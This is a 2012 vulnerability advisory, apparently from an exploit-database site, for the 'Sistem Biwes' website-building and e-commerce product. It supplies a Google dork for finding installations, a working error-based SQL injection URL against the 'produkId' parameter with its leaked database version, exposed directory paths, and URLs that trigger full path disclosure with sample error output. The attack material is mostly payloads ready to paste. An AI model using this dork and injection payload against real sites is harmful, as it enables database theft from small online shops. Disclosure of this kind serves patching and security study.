Sistem Biwes Multiple Vulnerability

2012.08.29
Credit: eidelweiss
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

=================================================================== Sistem Biwes Multiple Vulnerability =================================================================== Google Dork: "Powered by sistembiwes.com" Author: eidelweiss (@randyarios) Product / software: SISTEM BIWES Vendor Site: http://sistembiwes.com/ Product Price: RM240 / year =================================================================== Gratz: Devilzc0de and you!!! =================================================================== Product Description: Sistem Bina Website Sendiri(Biwes) Sistem Bina Website Sendiri atau lebih dikenali dengan nama Sistem Biwes adalah sistem bina website sendiri berkonsepkan DIY(Do It Yourself). Ia memberi peluang kepada mereka yang ingin mengendalikan website sendiri tetapi tidak mempunyai pengetahuan tentang website. Cara penggunaannya iaitu anda masukkan kandungan website, sistem secara automatik akan mencipta menu bagi page baru. Bagi website e-commerce pula sistem ini digabungkan dengan sistem shopping cart dan sistem pembayaran. Sistem ini sesuai untuk produk digital ataupun fizikal. Bilangan produk yang sedikit ataupun bilangan produk yang banyak =================================================================== Vulnerability: Due to improper input sanitation, parameters are prone to SQL injection, Dir Listing and Full Path Disclosure Vulnerability. =================================================================== p0c 1: SQL Injection Page: index.php Vulnerable param: 'produkId' http://host/index.php?c=[valid num]&a=cartM2&produkId=[inject here] // Use MySQL error based injection http://host/index.php?c=12&a=cartM2&produkId=(1)and(select%201%20from(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)-- Duplicate entry '5.1.63-cll1' for key 'group_key' p0c 2: Dir Listing path: - /webs/cartM2/include/ - /webs/cartM2/library/ - /webs/cartM2/images/ - etc p0c 3: Full Path Disclosure (FPD) path: multiple page: multiple Demo: http://host/webs/admin/index.php Warning: require_once(form_login.php) [function.require-once]: failed to open stream: No such file or directory in /home/[TARGET]/public_html/webs/admin/index.php on line 21 Fatal error: require_once() [function.require]: Failed opening required 'form_login.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/[TARGET]/public_html/webs/admin/index.php on line 21 http://host/webs/cartM2/library/database.php Warning: mysql_query() [function.mysql-query]: Access denied for user '[TARGET]'@'localhost' (using password: NO) in /home/[TARGET]/public_html/webs/cartM2/library/database.php on line 9 Warning: mysql_query() [function.mysql-query]: A link to the server could not be established in /home/[TARGET]/public_html/webs/cartM2/library/database.php on line 9 Access denied for user '[TARGET]'@'localhost' (using password: NO) etc.. etc.. ==================================================================== Respect To Be Respected =================================================================== ==========================| -=[ E0F ]=- |==========================

References:

http://sistembiwes.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top